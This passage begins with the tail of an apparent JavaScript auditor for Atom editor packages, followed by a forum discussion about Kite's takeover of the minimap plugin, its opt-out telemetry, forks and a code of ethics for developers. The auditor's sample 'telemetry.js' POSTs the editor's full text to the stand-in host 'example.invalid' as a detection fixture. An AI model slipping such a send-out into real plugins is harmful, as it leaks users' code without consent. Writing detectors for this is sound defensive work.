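  "lib/render.js": `
const editor = atom.workspace.getActiveTextEditor();
const text = editor.getText();
drawMinimap(text);`,
  "lib/telemetry.js": `
const https = require('https');
function report(editor) {
  const body = JSON.stringify({ src: editor.getText() });
  const req = https.request({ host: 'example.invalid', method: 'POST' });
  req.end(body);
}`,
};

const result = auditPackage(SAMPLE_PACKAGE);
console.log(`verdict: ${result.verdict}`);
for (const f of result.findings) {
  console.log(`${f.file}:${f.line} [${f.capability}] ${f.text}`);
}
```

Run against a real package directory by reading each .js/.coffee file into the map; a "review" verdict is a prompt to read the flagged lines, not proof of exfiltration.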

Man, where does this crap end? A permission system to click on a menu or type a character? A permission system to draw windows...?

I think there has to be some responsibility from projects that pack such plugins, to police their ecosystem. I can understand browsers having security layers, because they work exclusively with the biggest cesspool of them all (the internet), but stuff as basic as a text editor should not need something like that - if it does, something else has gone deeply wrong with the project.

Interesting that you use browsers as the example of the other end of the spectrum. This particular text editor is built on a browser.

That's very true - it's also the reason I stay the hell away from it :)

If you are looking for the github thread – https://github.com/atom-minimap/minimap/issues/588.

Totally biased takeaway [please read the complete GitHub thread]:

> Hi, folks -- Juan from Kite here, thank you for the feedback, we appreciate it.

> We have decided to leave the feature as opt-out since many users have found it useful. [...]

> [...] I've been an employee at Kite for over half a year now and this plugin is now officially maintained by Kite. [...]

I think that the BDFL system works in open source because it's too easy to fork the project. The old BDFL just transferred the power to a new BDFL, but it was not so clear for the community. There is a fork now, so if the situation doesn't improve and the users are unhappy, the Kite team will be the BDFL of an empty project without users.

Benevolent Dictator for Life for anyone else who was wondering.


This is one of the things that makes me think software development, like most other professions, should really have a formal code of ethics. If a lawyer or a construction engineer tried to do something equally dodgy, they would very soon find themselves hauled before a professional authority.

It should be made clear to the employees, management and investors of Kite that this is the sort of thing that marks you as someone willing to engage in unethical and underhanded behaviour. I wouldn't hire any such person into any team I manage, and I suspect quite a few other people wouldn't either. Actions have consequences. Especially unethical actions.

Lawyers do dodgy and unethical things as well, I wouldn't use them as a paragon of ethics.

An argument that explicitly talks about the consequences of unethical behaviour when it happens is not painting anyone as ethical paragons. You are missing the point, I think.

Heh, you know something is seriously f*cked up in industry when lawyers are taken for an ethics compass.

This is called a 'fiduciary duty' and is common in many professions (law, medicine, finance, real estate, clergy, etc)

Here's a great explanation and strategy for applying to software development: https://www.theatlantic.com/technology/archive/2016/10/infor...

I believe that is a self-conflicting proposition, since I believe morality is a subjective "property".

"Subjective" how exactly? There are surely some variations, but if this is about "my wallet has feelings too" morality, that would be all the more reason we'd need an (enforceable) code of ethics.

Subjective in the sense that something you find morally wrong I could find morally right, or morally neutral. E.g. for the specific issue of this thread, I consider what they did to be morally neither bad nor good. The developer has no obligation (moral or legal) to check with me before committing stuff in the repo he controls. He doesn't owe me anything. In fact I could say that I owe him (morally, by my moral standards, because I've been using his code). But that's just my view.

Well yes but morals and ethics are almost by definition about valuing the interaction between people. As such, even if you assume that moral is subjective, if you only have your own personal morality, that's rather useless - it only becomes useful if you can agree with some other people about common rules of behavior.

You could say for yourself "I personally don't believe in private property, so I don't see any objection with theft" but my hunch is that this argument wouldn't do much to calm the victim of your theft.

That proposed code of ethics in software seems like an attempt to create exactly such an agreement.
